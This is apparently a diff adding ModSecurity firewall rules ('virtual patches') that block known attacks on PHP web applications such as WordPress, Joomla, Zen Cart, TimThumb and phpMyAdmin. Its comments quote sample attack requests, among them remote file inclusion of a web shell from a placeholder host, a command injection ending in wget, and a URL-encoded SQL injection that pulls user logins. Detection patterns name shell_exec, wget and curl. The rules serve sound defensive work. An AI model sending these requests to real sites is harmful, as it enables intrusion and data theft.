+#SecRule REQUEST_URI "tiki-listpages.php\?find=.*maxrecords=.*initial=" # "t:urlDecodeUni,t:lowercase,id:330606,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki Spam Harvest List Pages attack'"
+
+#FCKEditor upload
+#fckeditor/editor/filemanager/connectors/php/upload.php?Type=File
+SecRule REQUEST_URI "fckeditor/editor/filemanager/connectors/php/upload\.php"  "chain,t:none,t:urlDecodeUni,t:lowercase,id:390627,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: possible fckeditor file upload attack (disable this rule if you use this function)'"
+SecRule ARGS:type "file"
+
+#Zen Cart SQL injection
+SecRule REQUEST_URI "/sqlpatch\.php"  "chain,t:none,t:urlDecodeUni,t:lowercase,id:390628,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zen Cart SQL injection exploit'"
+SecRule ARGS "sql@jah"
+
+SecRule REQUEST_URI "/(?:sqlpatch|record_company)\.php.*\.php"  "t:none,t:urlDecodeUni,t:lowercase,id:381628,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zen Cart SQL injection exploit'"
+
+#Joomla invalid characters
+SecRule REQUEST_URI "/index\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:390630,rev:8,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
+SecRule ARGS:format|ARGS:type|ARGS:layout "(\'|\:|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\$|\,|\;|\!|\`|\|)"  chain
+SecRule ARGS:type "!(rss;|[a-z]+\|html|catalogrule-rule_condition_product)" "chain"
+SecRule ARGS:option "^com_jomres$"
+
+#http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
+#SecRule REQUEST_URI "/wp-login\.php" # "t:urlDecodeUni,t:lowercase,chain,id:390631,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress <= 2.8.2 Remote admin reset password exploit'"
+#SecRule ARGS:key[] ".*"
+
+#block invalid characters in format ARG
+#SecRule REQUEST_URI "/index\.php" # "t:urlDecodeUni,t:lowercase,chain,id:390632,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters format variable in RSS request'"
+#SecRule ARGS:format "(/|\'|\:|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\$|\,|\;|\!|\`|\|)"
+#block invalid characters in format ARG
+SecRule REQUEST_URI "/index\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390633,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters format variable in RSS request'"
+SecRule ARGS:view "(\%)"  chain
+SecRule ARGS:page "!(admin)"
+
+#JITP for really poorly documented wordpress vulnerability
+SecRule REQUEST_URI "/index\.php"  "phase:2,log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress plugin WP-Syntax Remote Command Execution'"
+SecRule ARGS "^session_start$"  chain
+SecRule ARGS "(?:base64_decode|decode_base64)"
+
+#/index.php?main_page=conditions//admin/record_company.php/password_forgotten.php?action=insert
+SecRule REQUEST_URI "/password_forgotten\.php"  "log,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390637,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zencart PHP code injection attack'"
+SecRule ARGS:action "^insert$" chain
+SecRule ARGS|REQUEST_BODY "(php|;+|shell_exec|(?:w|ftp)get|system\()"
+
+#/index.php?main_page=conditions//admin/record_company.php/password_forgotten.php?action=insert
+SecRule REQUEST_URI "/password_forgotten\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:390638,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zencart PHP code injection attack'"
+SecRule ARGS:admin_email "(union select|php|;+|shell_exec|(?:w|ftp)get|system\()"
+
+
+#Megabook XSS
+SecRule REQUEST_URI "cgi-bin/admin\.cgi"  "log,deny,log,auditlog,t:urlDecodeUni,t:lowercase,chain,id:390644,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MegaBook XSS attack'"
+SecRule ARGS:entryid "\""
+
+#index.php?controller=%0AA:B&id=10&option=com_tagtrends
+SecRule REQUEST_URI "index\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,id:390645,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla TagTrends variable injection attack'"
+SecRule ARGS:controller "!^[0-9a-z]+$" chain
+SecRule ARGS:option "com_tagtrends"
+
+SecRule REQUEST_URI "index\.php"  "log,deny,log,auditlog,t:none,t:lowercase,chain,id:390646,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla TagTrends variable injection attack'"
+SecRule ARGS:controller "%" chain
+SecRule ARGS:option "com_tagtrends"
+
+SecRule REQUEST_URI "admin/(?:cmd|sql|php)shell\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390647,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde command shell access'"
+
+
+SecRule REQUEST_URI "vbroot/faq\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390649,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible vBulletin database credentials theft'"
+SecRule REQUEST_URI "/faq\.php?s=database"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390650,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible vBulletin database credentials theft'"
+
+#Really badly written application
+#SecRule ARGS:password|ARGS:username "(?:\'|\`)" # "t:none,chain,log,deny,auditlog,id:390552,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible SQL injection in password or username field, disable this rule if you know your application is not vulnerable to this.'"
+#SecRule REQUEST_URI "!(/ucp\.php|\?app=core&module=global|/authenticate\.php\?accessdenied)"
+
+
+
+#Remarkably vulnerable application
+#/owl/locale/English/help/help_register.php?==&expand=1&order=name&parent=&sess=SQL_inject
+SecRule REQUEST_URI "/owl/"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390570,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Owl SQL injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:sess|ARGS:type|ARGS:expand "(\%|-|;|\)|\(|/|'|=|\*|#|\")"
+
+#Remarkably vulnerable application
+#/owl/locale/English/help/help_register.php?==&expand=1&order=name&parent=&sess=SQL_inject
+SecRule REQUEST_URI "/(?:showrecords|help_(?:browse|prefs|register))\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390571,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Owl SQL injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:sess|ARGS:type|ARGS:expand "(\%|-|;|\)|\(|/|'|=|\*|#|\")"
+
+
+
+
+#e107 PHP code injection
+SecRule ARGS:author_name "(?:\[ ?php ?\]|< ?\?)" "id:390757,rev:2,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e107 PHP code injection vulnerability',logdata:'%{TX.0}'"
+
+#Sulata iSoft (stream.php) Local File Disclosure Exploit
+SecRule REQUEST_URI "/stream\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390758,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sulata iSoft Local File Disclosure Exploit',logdata:'%{TX.0}'"
+SecRule ARGS:path "\.\."
+
+#Honeypot
+#products.php?homeinclude='
+SecRule REQUEST_URI "/products\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390759,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection Exploit',logdata:'%{TX.0}'"
+SecRule ARGS:homeinclude "\'"
+
+#Oscommerce
+SecRule REQUEST_URI "(?:/admin/.*\.php/(?:login|application_top)|/m32)\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390756,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oscommerce Exploit',logdata:'%{TX.0}'"
+
+#zencart sql injection
+SecRule REQUEST_URI "\.php/password_forgotten\.php"  "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:320757,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ZenCart Sql Injection Exploit',logdata:'%{TX.0}'"
+
+#XSS JITPs
+SecRule ARGS "@pm < > script onevent script about applet activex chrome"         "id:333869,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309004,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_XSS"
+
+SecRule REQUEST_FILENAME "admin-mail-info\.php"         "phase:2,id:322100,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: admin-mail-info.php XSS attack (CVE-2016-1000146)',severity:2,chain"
+SecRule ARGS:itemid "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode"
+
+SecRule REQUEST_FILENAME "ultimate-instagram-feed\.php"         "phase:2,id:322101,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ultimate-instagram-feed.php XSS attack (CVE-2017-16758)',severity:2,chain"
+SecRule ARGS:access_token "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode"
+
+
+# Rule 310349:exoops Input Validation Flaws SQL injection and XSS
+SecRule ARGS:viewcat "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "phase:2,id:310349,rev:1,deny,status:403,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php cross-site-scripting attempt',log,auditlog"
+
+
+# Rule 310324:  phpSysInfo XSS vulns
+SecRule ARGS:sensor_program "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310324,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo index.php cross-site-scripting attempt',log,auditlog"
+
+# Rule 310386: CPG Dragonfly XSS
+#SecRule REQUEST_URI "/index\.php\?name=.*\&(?:file|mode)=.*\&(?:meta|id)=.*\">.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310386,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly index.php cross-site-scripting attempt'"
+
+
+# Rule 310389: CPG Dragonfly XSS
+#SecRule REQUEST_URI "/index\.php\?name=.*&profile=.*\">.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310389,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly index.php cross-site-scripting attempt'"
+
+# Rule 310422:PinnacleCart XSS Attack
+#SecRule REQUEST_URI "/index\.php\?p=catalog&parent=.*&pg=\">" #        "id:310422,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PinnacleCart index.php cross-site-scripting attempt'"
+
+
+# Rule 310433: EasyPHPCalendar XSS
+#SecRule REQUEST_URI "/index\.php\?mo=.*&yr=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyPHPCalendar index.php cross-site-scripting attempt'"
+
+# Rule 310452:Coppermine Photo Gallery Multiple XSS
+#SecRule REQUEST_URI "/index\.php\?lang=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310452,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine index.php cross-site-scripting attempt'"
+
+#billing system
+#SecRule REQUEST_URI "/billing/index.php" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,chain,id:390642,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Billing system XSS attack'"
+#SecRule ARGS "(<|>)"
+
+#contact form XSS
+SecRule REQUEST_URI "/contact\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,chain,id:390643,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Contact form XSS attack'"
+SecRule ARGS:comments|ARGS:name|ARGS:domain_name|ARGS:email_address|ARGS:phone|ARGS:department|ARGS:subject|ARGS:security_code "(<|>)"
+
+#Horde command shell XSS attack
+SecRule REQUEST_URI "admin/(?:cmd|sql|php)shell\.php/\">"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:390648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde command shell XSS attack'"
+
+#comments= contactus XSS
+SecRule REQUEST_URI "/contactus\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:393651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible XSS injection in contactus application comments'"
+SecRule ARGS:comments|ARGS:username|ARGS:email|ARGS:name|ARGS:orgname|ARGS:phone|ARGS:address "(?:<|>|script)"
+
+#Another remarkably vulnerable app
+#/members/index.php
+SecRule REQUEST_URI "(?:/members/index|signup)\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366000,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
+SecRule ARGS:username|ARGS:address|ARGS:email|ARGS:name|ARGS:orgname|ARGS:phone|ARGS:password|ARGS:expand|ARGS:comments "< ?script"
+
+#knowledgebase vulns
+SecRule REQUEST_FILENAME "/knowledgebase\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366001,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
+SecRule ARGS "(?:<|>|script|^\')"
+
+SecRule REQUEST_FILENAME "/knowledgebase\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:366002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
+SecRule ARGS:search "(?:onevent|<|>|script)"
+
+#XSS in Sodahead Polls wordpress plugin
+SecRule REQUEST_FILENAME "/poll\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS exploit in Sodahead Polls wordpress plugin',logdata:'%{TX.0}'"
+SecRule ARGS:customize "(<|>)"
+
+#XSS in Rating-Widget wordpress plugin
+SecRule REQUEST_FILENAME "/save\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS exploit in Rating-Widget wordpress plugin',logdata:'%{TX.0}'"
+SecRule ARGS:rw_form_hidden_field_name "(<|>)"
+
+SecMarker END_PHP_JITP_XSS
+
+SecRule REQUEST_URI "(?:(?:tim|php)thumb|thumb|_tbs|dbase|thumb|thumbopen|/themify/img)\.php"         "id:333870,rev:2,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309005,t:none,pass,nolog,noauditlog,skipAfter:END_TIMTHUMB"
+
+#
+SecRule ARGS:/fltr/ "\;"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,capture,id:380215,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Command Injection Attempt',logdata:'%{TX.0}'"
+
+SecRule ARGS:src "\$"   "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381214,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Command Injection Attempt',logdata:'%{TX.0}'"
+
+SecRule ARGS:src "@beginsWith http://%{SERVER_NAME}/"  "id:333871,pass,nolog,noauditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,rev:3,skipAfter:END_TIMTHUMB"
+
+SecRule ARGS:src "(?:(?:ht|f)tps?://(.*|)(?:(?:flickr|picasa|wordpress|img.youtube|photobucket|blogger)\.com\.|upload\.wikimedia\.org\.)|^/[a-z][0-9]+\.\./[a-z0-9]+\.(?:gif|jpg|png))" "log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381202,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Remote Code Execution Vulnerability Exploit attempt',logdata:'%{TX.0}'"
+
+SecRule ARGS:src "!(?:\.(jpe?g|gif|png|bmp|pdf|mp(:?3|e?g))(?:$|\?(?:w|h|fit|o(?:h|e)|resize)=)|^(?:\.\./|/|multifeed)|^$|^[0-9a-z]+/)"   "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381203,rev:12,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TimThumb Non Image Upload Attempt',logdata:'%{TX.0}'"
+
+
+SecMarker END_TIMTHUMB
+
+
+SecRule REQUEST_URI "/(?:ibrowser|scripts/(?:loadmsg|rfiles|symbols))\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:381204,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: iBrowser Plugin Probe',logdata:'%{TX.0}'"
+SecRule ARGS:lang "test"
+
+SecRule REQUEST_URI "/extras/curltest\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381205,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Curltest Probe',logdata:'%{TX.0}'"
+
+#dbase.php?action='
+SecRule REQUEST_URI "/dbase\.php"  "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381215,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dbase SQL injection attack',logdata:'%{TX.0}'"
+SecRule ARGS:action "'" "t:none,t:urlDecodeUni"
+
+#Wordpress JITPs
+SecRule REQUEST_FILENAME|ARGS|!ARGS:message|!ARGS:post|!ARGS:/wpTextbox/ "wp-config\.php"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381206,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to WordPress configuration file blocked',logdata:'%{TX.0}'"
+
+SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php"         "id:333872,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309006,t:none,pass,nolog,noauditlog,skipAfter:END_WP_SETUP"
+
+#SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381207',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress remote IP address for Database Denied.',logdata:'%{matched_var}',tag:'CVE-2011-4899'"
+#SecRule ARGS_GET:step "@streq 2" "chain"
+#SecRule ARGS_POST:dbhost "^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$" "chain"
+#SecRule MATCHED_VAR "!@streq %{server_addr}"
+
+#SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381208',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress remote IP address for Database Denied.',logdata:'%{matched_var}',tag:'CVE-2011-4899'"
+#SecRule ARGS_GET:step "@streq 2" "chain"
+#SecRule ARGS_POST:dbhost ".*" "chain"
+#SecRule MATCHED_VAR "!^(?:%{server_name}|localhost|127\.0\.0\.1)$"
+
+SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381209',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Request is missing required parameters.',tag:'CVE-2011-4898'"
+SecRule ARGS_GET:step "@streq 2" "chain"
+SecRule &ARGS_POST:dbhost|&ARGS_POST:dbname|&ARGS_POST:uname|&ARGS_POST:pwd|&ARGS_POST:prefix|&ARGS_POST:submit "!@eq 1"
+
+SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "chain,phase:2,t:none,t:lowercase,log,auditlog,deny,id:'381210',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Multiple Cross Site Scripting Vulnerabilities in \'setup-config.php\' page',logdata:'%{matched_var}',tag:'CVE-2012-0782'"
+SecRule ARGS_GET:step "@streq 2" "chain"
+SecRule ARGS_POST:dbhost|ARGS_POST:dbname|ARGS_POST:uname "@pm < > \" ( ) = ;" "ctl:auditLogParts=+E,multiMatch,t:none,t:htmlEntityDecode,t:jsDecode,t:cssDecode"
+
+
+SecMarker END_WP_SETUP
+
+#/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php
+SecRule REQUEST_FILENAME "/wp-content/plugins/1-flash-gallery/upload\.php"         "t:none,t:urlDecodeUni,t:lowercase,chain,id:311291,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: 1 Flash Gallery Wordpress Plugin File Upload Exploit'"
+SecRule ARGS:fileext "(?:php|pl|cgi|sh|py)"
+
+#SecRule ARGS:abspath
+SecRule ARGS:abspath "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "t:none,t:urlDecodeUni,t:lowercase,id:311292,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: abspath RFI Exploit'"
+
+#/pma/scripts/setup.php
+#action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:55:"http://www.example.com/malicious_payload.php";}}
+SecRule REQUEST_URI "/scripts/setup\.php"         "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpMyAdmin setup.php RFI Exploit'"
+SecRule ARGS:configuration "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
+
+#config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
+SecRule REQUEST_URI "/config_db\.inc\.php"         "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311294,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution attack blocked'"
+SecRule ARGS:2 "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
+
+#honeypot hits
+#/include/scripts/export_batch.inc.php?DIR=test??
+#/forgot_password.php?inc_dir=test
+#/web.php?id='
+#/songinfo.php?commonpath=test??
+#search.php?catid='
+
+#/backupmgt/localJob.php?session=fail;cd+/tmp;wget
+SecRule REQUEST_URI "/localjob\.php"         "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311235,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: localjob.php Remote Code Execution attack blocked'"
+SecRule ARGS:session "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\;)" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecMarker END_PHP_JITP
+
+#/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
+#
+SecRule REQUEST_URI "/user/register"         "chain,phase:2,id:322194,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal remote command execution blocked',severity:2"
+SecRule ARGS:form_id "user_register_form" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:/post_render/ "exec" "t:none,t:urlDecodeUni,t:lowercase,chain"
+SecRule ARGS:/mail/ "(?:\||wget|curl|\;|-|sh)" "t:none,t:urlDecodeUni,t:lowercase"
+
+#wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_login%252520FROM%252520xayzj_users%252523
+SecRule REQUEST_URI "wp-json/wc/store/products/collection-data"         "chain,phase:2,id:322193,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Woocommerce SQLi blocked',severity:2"
+SecRule ARGS:/calculate_attribute_counts/ "(?:union|\%2522)" "t:none,t:removeCommentsChar,t:removeWhiteSpace,t:lowercase,multimatch"
+
+SecRule REQUEST_FILENAME "/nexos-wp/top-map/"         "chain,phase:2,id:322192,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress nexos theme XSS attack (CVE 2020-15364)',severity:2"
+SecRule &ARGS:search_order "@gt 0" "chain,t:none"
+SecRule ARGS:search_location "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+SecRule ARGS:deliverypostcode|ARGS:invoicepostcode|ARGS:postcode "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|\bon(?:abort|blur|change|click|event|submit|dragdrop|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b ?= ?(\"|\')? ?\w|>( |\+)?<( |\+)?img( |\+)?src( |\+)?=( |\+)?(ht|f)tps?:/)"         "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,id:311295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cross site scripting attack blocked'"
+
+
+#username= > &password=%0a
+SecRule ARGS:username ">"  "phase:2,chain,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,capture,id:336463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: antMan <= 0.9.0c Authentication Bypass attack blocked',logdata:'%{TX.0}'"
+SecRule ARGS:password "\%0a" "t:none,chain"
+SecRule REQUEST_METHOD "(?:POST|GET)" "t:none"
+
+
+#WP config file protection
+SecRule REQUEST_URI "(?:^/?[a-z0-9/]{0,}wp-login\.php\?vaultpress=|^/smb/file-manager/)" 	"phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:372473,skipAfter:END_RULE_336461"
+
+SecRule REQUEST_FILENAME "\.cgi$" 	"phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:377475,skipAfter:END_RULE_336461"
+
+#../wp-config.php
